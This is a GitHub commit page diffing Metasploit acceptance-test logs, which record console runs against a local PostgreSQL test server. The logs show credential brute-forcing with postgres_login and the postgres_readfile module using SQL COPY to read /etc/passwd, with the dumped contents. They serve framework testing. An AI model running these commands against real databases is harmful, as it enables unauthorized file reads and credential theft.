Skip to content

Commit

Permalink
Update docs
Browse files Browse the repository at this point in the history
  • Loading branch information
@msjenkins-r7
msjenkins-r7 committed Mar 21, 2024
1 parent 566bfd8 commit 725cb4e
Show file tree
Hide file tree
Showing 2,881 changed files with 11,348 additions and 9,760 deletions.
26 changes: 14 additions & 12 deletions ...sts/data/attachments/12173e972849d358.txt → ...sts/data/attachments/192005180ab42f3b.txt
View file
Original file line number Diff line number Diff line change
@@ -1,27 +1,29 @@
use auxiliary/scanner/postgres/postgres_login
Stopping all jobs...
msf6 auxiliary(scanner/postgres/postgres_version) > irb -e '(self.respond_to?(:framework) ? framework : self).datastore.user_defined.clear'
msf6 auxiliary(scanner/postgres/postgres_hashdump) > irb -e '(self.respond_to?(:framework) ? framework : self).datastore.user_defined.clear'
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > run PASS_FILE= USER_FILE= CreateSession=true username=postgres password=password rhost=127.0.0.1 rport=5432
msf6 auxiliary(scanner/postgres/postgres_login) > [!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:5432 - Login Successful: postgres:password@template1
[*] PostgreSQL session 4 opened (127.0.0.1:42301 -> 127.0.0.1:5432) at 2024-03-14 08:38:31 +0000
[*] PostgreSQL session 3 opened (127.0.0.1:33593 -> 127.0.0.1:5432) at 2024-03-21 08:40:03 +0000
use auxiliary/admin/postgres/postgres_readfile
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 Postgres session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/postgres/postgres_login) > run session=4 Verbose=true
msf6 auxiliary(scanner/postgres/postgres_login) > run session=3 Verbose=true
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_readfile) > [*] 127.0.0.1:5432 Postgres - querying with 'select has_database_privilege(current_user,current_database(),'TEMP')'
[*] 127.0.0.1:5432 Postgres - querying with 'CREATE TEMP TABLE akimsR (INPUT TEXT);
COPY akimsR FROM '/etc/passwd';
SELECT * FROM akimsR'
[*] 127.0.0.1:5432 Postgres - querying with 'CREATE TEMP TABLE VWaaKuDKL (INPUT TEXT);
COPY VWaaKuDKL FROM '/etc/passwd';
SELECT * FROM VWaaKuDKL'
[*] 127.0.0.1:5432 Rows Returned: 21
Query Text: 'CREATE TEMP TABLE akimsR (INPUT TEXT);
COPY akimsR FROM '/etc/passwd';
SELECT * FROM akimsR'
=====================================================================================================================
Query Text: 'CREATE TEMP TABLE VWaaKuDKL (INPUT TEXT);
COPY VWaaKuDKL FROM '/etc/passwd';
SELECT * FROM VWaaKuDKL'
==============================================================================================================================

input
-----
Expand Down Expand Up @@ -68,11 +70,11 @@ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
postgres:x:999:999::/var/lib/postgresql:/bin/bash
Debian-exim:x:101:101::/var/spool/exim4:/bin/false
[+] 127.0.0.1:5432 Postgres - /etc/passwd saved in /home/runner/.msf4/loot/20240314083831_default_127.0.0.1_postgres.file_044701.txt
[+] 127.0.0.1:5432 Postgres - /etc/passwd saved in /home/runner/.msf4/loot/20240321084003_default_127.0.0.1_postgres.file_555966.txt
[+] 127.0.0.1:5432 Postgres - Command complete.
[*] Auxiliary module execution completed
sessions -K
msf6 auxiliary(admin/postgres/postgres_readfile) > jobs -K
[*] Killing all sessions...
[*] 127.0.0.1 - PostgreSQL session 4 closed.
[*] 127.0.0.1 - PostgreSQL session 3 closed.
msf6 auxiliary(admin/postgres/postgres_readfile) >
11 changes: 7 additions & 4 deletions ...sts/data/attachments/48c9dfc66f8be4c4.txt → ...sts/data/attachments/1c69641bb4063dff.txt
View file
Original file line number Diff line number Diff line change
@@ -1,16 +1,19 @@
use auxiliary/scanner/postgres/postgres_login
msf6 post(test/postgres) > irb -e '(self.respond_to?(:framework) ? framework : self).datastore.user_defined.clear'
Stopping all jobs...
msf6 auxiliary(admin/postgres/postgres_readfile) > irb -e '(self.respond_to?(:framework) ? framework : self).datastore.user_defined.clear'
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > run PASS_FILE= USER_FILE= CreateSession=true username=postgres password=password rhost=127.0.0.1 rport=5432
msf6 auxiliary(scanner/postgres/postgres_login) > [!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:5432 - Login Successful: postgres:password@template1
[*] PostgreSQL session 2 opened (127.0.0.1:41175 -> 127.0.0.1:5432) at 2024-03-14 08:38:31 +0000
[*] PostgreSQL session 4 opened (127.0.0.1:40263 -> 127.0.0.1:5432) at 2024-03-21 08:40:04 +0000
use auxiliary/admin/postgres/postgres_sql
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 Postgres session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/postgres/postgres_login) > run session=2 Verbose=true
msf6 auxiliary(scanner/postgres/postgres_login) > run session=4 Verbose=true
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_sql) > [*] 127.0.0.1:5432 Postgres - querying with 'select version()'
[*] 127.0.0.1:5432 Rows Returned: 1
Expand All @@ -26,5 +29,5 @@ Query Text: 'select version()'
sessions -K
msf6 auxiliary(admin/postgres/postgres_sql) > jobs -K
[*] Killing all sessions...
[*] 127.0.0.1 - PostgreSQL session 2 closed.
[*] 127.0.0.1 - PostgreSQL session 4 closed.
msf6 auxiliary(admin/postgres/postgres_sql) >
0 ...sts/data/attachments/6a8dfaa84fa06acd.txt → ...sts/data/attachments/1cdc147debd5b6ee.txt
View file
File renamed without changes.
0 ...sts/data/attachments/1278209e8bfb767d.txt → ...sts/data/attachments/1edd89485bd8eb12.txt
View file
File renamed without changes.
14 changes: 7 additions & 7 deletions ...sts/data/attachments/d02802688f8a0a12.txt → ...sts/data/attachments/21eae700116e76be.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -5,13 +5,13 @@ Stopping all jobs...
msf6 auxiliary(admin/postgres/postgres_readfile) > [*] Running module against 127.0.0.1
[+] 127.0.0.1:5432 Postgres - Logged in to 'postgres' with 'postgres':'password'
[*] 127.0.0.1:5432 Postgres - querying with 'select has_database_privilege(current_user,current_database(),'TEMP')'
[*] 127.0.0.1:5432 Postgres - querying with 'CREATE TEMP TABLE zHqJdve (INPUT TEXT);
COPY zHqJdve FROM '/etc/passwd';
SELECT * FROM zHqJdve'
[*] 127.0.0.1:5432 Postgres - querying with 'CREATE TEMP TABLE ADVvdRx (INPUT TEXT);
COPY ADVvdRx FROM '/etc/passwd';
SELECT * FROM ADVvdRx'
[*] 127.0.0.1:5432 Rows Returned: 21
Query Text: 'CREATE TEMP TABLE zHqJdve (INPUT TEXT);
COPY zHqJdve FROM '/etc/passwd';
SELECT * FROM zHqJdve'
Query Text: 'CREATE TEMP TABLE ADVvdRx (INPUT TEXT);
COPY ADVvdRx FROM '/etc/passwd';
SELECT * FROM ADVvdRx'
========================================================================================================================

input
Expand Down Expand Up @@ -59,7 +59,7 @@ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
postgres:x:999:999::/var/lib/postgresql:/bin/bash
Debian-exim:x:101:101::/var/spool/exim4:/bin/false
[+] 127.0.0.1:5432 Postgres - /etc/passwd saved in /home/runner/.msf4/loot/20240314083831_default_127.0.0.1_postgres.file_532261.txt
[+] 127.0.0.1:5432 Postgres - /etc/passwd saved in /home/runner/.msf4/loot/20240321084003_default_127.0.0.1_postgres.file_996314.txt
[+] 127.0.0.1:5432 Postgres - Command complete.
[*] 127.0.0.1:5432 Postgres - Disconnected
[*] Auxiliary module execution completed
Expand Down
0 ...sts/data/attachments/6f423d6679d075cc.txt → ...sts/data/attachments/284503857a910213.txt
View file
File renamed without changes.
0 ...sts/data/attachments/70e4e1fe1c9015b9.txt → ...sts/data/attachments/29b34632d993ca25.txt
View file
File renamed without changes.
2 changes: 1 addition & 1 deletion ...sts/data/attachments/47bb8c2cd643f37e.txt → ...sts/data/attachments/2cbafb1d85e3dee3.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -13,4 +13,4 @@ run lhost=127.0.0.1 username=postgres password=password rhost=127.0.0.1 rport=54

## Replication commands
use auxiliary/scanner/postgres/postgres_version
run session=2 Verbose=true
run session=1 Verbose=true
26 changes: 19 additions & 7 deletions ...sts/data/attachments/e5eb7e9c7625f6f7.txt → ...sts/data/attachments/2fc8aeea7dbe7619.txt
View file
Original file line number Diff line number Diff line change
@@ -1,17 +1,29 @@
use auxiliary/scanner/postgres/postgres_login
Stopping all jobs...
msf6 post(test/postgres) > irb -e '(self.respond_to?(:framework) ? framework : self).datastore.user_defined.clear'
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
msf6 > loadpath test/modules
Loaded 40 modules:
14 auxiliary modules
13 exploit modules
13 post modules
msf6 > features set postgresql_session_type true
postgresql_session_type => true
[!] Run the save command and restart the console for this feature to take effect.
msf6 > use auxiliary/scanner/postgres/postgres_login
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > irb -e '(self.respond_to?(:framework) ? framework : self).datastore.user_defined.clear'
msf6 auxiliary(scanner/postgres/postgres_login) > run PASS_FILE= USER_FILE= CreateSession=true username=postgres password=password rhost=127.0.0.1 rport=5432
msf6 auxiliary(scanner/postgres/postgres_login) > [!] No active DB -- Credential data will not be saved!
[!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:5432 - Login Successful: postgres:password@template1
[*] PostgreSQL session 5 opened (127.0.0.1:39449 -> 127.0.0.1:5432) at 2024-03-14 08:38:35 +0000
[*] PostgreSQL session 1 opened (127.0.0.1:37293 -> 127.0.0.1:5432) at 2024-03-21 08:40:03 +0000
use auxiliary/admin/postgres/postgres_sql
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: FATAL VFATAL C28P01 Mpassword authentication failed for user "admin" Fauth.c L323 Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: FATAL VFATAL C28P01 Mpassword authentication failed for user "admin" Fauth.c L323 Rauth_failed)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 Postgres session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/postgres/postgres_login) > run session=5 Verbose=true
msf6 auxiliary(scanner/postgres/postgres_login) > run session=1 Verbose=true
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_sql) > [*] 127.0.0.1:5432 Postgres - querying with 'select version()'
[*] 127.0.0.1:5432 Rows Returned: 1
Expand All @@ -27,5 +39,5 @@ Query Text: 'select version()'
sessions -K
msf6 auxiliary(admin/postgres/postgres_sql) > jobs -K
[*] Killing all sessions...
[*] 127.0.0.1 - PostgreSQL session 5 closed.
[*] 127.0.0.1 - PostgreSQL session 1 closed.
msf6 auxiliary(admin/postgres/postgres_sql) >
0 ...sts/data/attachments/3e5f5dce78311e89.txt → ...sts/data/attachments/397145e6b5bea80a.txt
View file
File renamed without changes.
0 ...sts/data/attachments/13232dc60d6655d4.txt → ...sts/data/attachments/3b18fb2ab80c0932.txt
View file
File renamed without changes.
25 changes: 0 additions & 25 deletions acceptance-tests/data/attachments/3d8852bc5442cd31.txt
View file

This file was deleted.

0 ...sts/data/attachments/95910f35736e1824.txt → ...sts/data/attachments/3e57015b8f3c68fb.txt
View file
File renamed without changes.
35 changes: 12 additions & 23 deletions ...sts/data/attachments/7522a97662bc9c84.txt → ...ests/data/attachments/40b30210320d2c4.txt
View file
Original file line number Diff line number Diff line change
@@ -1,28 +1,18 @@
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
msf6 > loadpath test/modules
Loaded 40 modules:
14 auxiliary modules
13 exploit modules
13 post modules
msf6 > features set postgresql_session_type true
postgresql_session_type => true
[!] Run the save command and restart the console for this feature to take effect.
msf6 > use auxiliary/admin/postgres/postgres_readfile
use auxiliary/admin/postgres/postgres_readfile
Stopping all jobs...
msf6 auxiliary(scanner/postgres/postgres_version) > run lhost=127.0.0.1 username=postgres password=password rhost=127.0.0.1 rport=5432 Verbose=true
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_readfile) > run lhost=127.0.0.1 username=postgres password=password rhost=127.0.0.1 rport=5432 Verbose=true
[*] Running module against 127.0.0.1
msf6 auxiliary(admin/postgres/postgres_readfile) > [*] Running module against 127.0.0.1
[+] 127.0.0.1:5432 Postgres - Logged in to 'postgres' with 'postgres':'password'
[*] 127.0.0.1:5432 Postgres - querying with 'select has_database_privilege(current_user,current_database(),'TEMP')'
[*] 127.0.0.1:5432 Postgres - querying with 'CREATE TEMP TABLE KHsZTBzawaKYT (INPUT TEXT);
COPY KHsZTBzawaKYT FROM '/etc/passwd';
SELECT * FROM KHsZTBzawaKYT'
[*] 127.0.0.1:5432 Postgres - querying with 'CREATE TEMP TABLE FKVmTHJajSOswq (INPUT TEXT);
COPY FKVmTHJajSOswq FROM '/etc/passwd';
SELECT * FROM FKVmTHJajSOswq'
[*] 127.0.0.1:5432 Rows Returned: 19
Query Text: 'CREATE TEMP TABLE KHsZTBzawaKYT (INPUT TEXT);
COPY KHsZTBzawaKYT FROM '/etc/passwd';
SELECT * FROM KHsZTBzawaKYT'
==========================================================================================================================================
Query Text: 'CREATE TEMP TABLE FKVmTHJajSOswq (INPUT TEXT);
COPY FKVmTHJajSOswq FROM '/etc/passwd';
SELECT * FROM FKVmTHJajSOswq'
=============================================================================================================================================

input
-----
Expand Down Expand Up @@ -65,12 +55,11 @@ irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
postgres:x:999:999::/var/lib/postgresql:/bin/bash
[+] 127.0.0.1:5432 Postgres - /etc/passwd saved in /home/runner/.msf4/loot/20240314083832_default_127.0.0.1_postgres.file_536705.txt
[+] 127.0.0.1:5432 Postgres - /etc/passwd saved in /home/runner/.msf4/loot/20240321084005_default_127.0.0.1_postgres.file_692913.txt
[+] 127.0.0.1:5432 Postgres - Command complete.
[*] 127.0.0.1:5432 Postgres - Disconnected
[*] Auxiliary module execution completed
sessions -K
msf6 auxiliary(admin/postgres/postgres_readfile) > jobs -K
[*] Killing all sessions...
msf6 auxiliary(admin/postgres/postgres_readfile) > Stopping all jobs...
msf6 auxiliary(admin/postgres/postgres_readfile) >
Loading

0 comments on commit 725cb4e

Please sign in to comment.